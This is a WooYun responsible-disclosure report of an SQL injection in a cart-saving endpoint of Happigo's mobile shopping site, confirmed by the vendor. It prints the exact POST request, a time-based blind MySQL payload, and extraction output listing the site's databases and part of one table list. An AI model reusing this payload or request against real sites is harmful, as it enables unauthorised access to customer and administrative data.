当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119279

漏洞标题:快乐购物某站SQL注射涉及大量数据库

相关厂商:快乐购物股份有限公司

漏洞作者: 紫霞仙子

提交时间:2015-06-09 16:08

修复时间:2015-07-25 09:50

公开时间:2015-07-25 09:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-10: 厂商已经确认,细节仅向厂商公开
2015-06-20: 细节向核心白帽子及相关领域专家公开
2015-06-30: 细节向普通白帽子公开
2015-07-10: 细节向实习白帽子公开
2015-07-25: 细节向公众公开

简要描述:

233

详细说明:

这个站和主站比了下,怎么比主站的数据量还大啊!!!
post的几个参数都检查下,这里只演示一个参数。
POST /order/cartsave.php HTTP/1.1
Content-Length: 228
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 3g.happigo.com
Cookie: 
Host: 3g.happigo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
delcartbtn0=%e5%88%a0%e9%99%a4&cart_rec_id0=ad&goodsnum702256=1&goods_total=1&specid%5b%5d=77999

漏洞证明:

---
Parameter: cart_rec_id0 (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: delcartbtn0=%e5%88%a0%e9%99%a4&cart_rec_id0=ad AND (SELECT * FROM (SELECT(SLEEP(5)))hgCu)&goodsnum702256=1&goods_total=1&specid[]=77999
---
back-end DBMS: MySQL 5.0.12
current user:    '3g@10.[打码]'
available databases [16]:
[*] app_manager
[*] goods_admin            
[*] information_schema
[*] interface_admin      
[*] mysql
[*] orderdb
[*] performance_schema
[*] shenghuofuwu
[*] special
[*] test
[*] touch_manager
[*] tsbd
[*] wap_goods
[*] wap_manager
[*] weixin
[*] zt_manager
16个库,涉及mananger的比较多。
Database: goods_admin
[335 tables]
+------------------------------------+
| HBP_album                          |
| HBP_brand                          |
| HBP_news                           |
| HBP_news_ext                       |
| HBP_notice                         |
| HBP_pics                           |
| HBP_question                       |
| HBP_video_album                    |
| HBP_videos                         |
| 2014_card                          |
| 2014_order_card_error              |
| 2014_order_card                    |
| 723dongche                         |
| acti_cs                            |
| activity                           |
| activity_dt                        |
| acts                               |
| acts_comments                      |
| acts_comments_count                |
| acts_labels                        |
| acts_to_goods                      |
| acts_to_labels                     |
| add_buy_list                       |
| address                            |
| address_2015                       |
| address_20150105                   |
| address_20150417                   |
| admin_user_oplog                   |
| admin_users                        |
| advertisings                       |
| advertisings_imgs                  |
| article_list                       |
| article_list_ext                   |
| baba_category                      |
| baba_lunbo                         |
| baba_news                          |
| baba_qiandao                       |
| baba_qiandao_info                  |
| baba_voto                          |
| baba_voto_info                     |
| bank_pay_coupon                    |
| bi_all_channel_order_goods_summary |
| bi_goods_summary                   |
| bi_tv_online_goods_info            |
| bigdeal                            |
| blog                               |
| brand_adlist                       |
| brand_category                     |
这不多贴出来了。

修复方案:

这次数据比上次更给力,自评严重性,
求 20 rank!!!!!

版权声明:转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-10 09:48

厂商回复:

谢谢紫霞对快乐购信息安全的支持!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-09 16:40 | 酸奶、 ( 普通白帽子 | Rank:182 漏洞数:27 )

    你关注的白帽子 紫霞仙子 发表了漏洞 快乐购物某站SQL注射涉及大量数据库

  2. 2015-06-09 17:09 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @酸奶、 好快啊 天天都是sql注入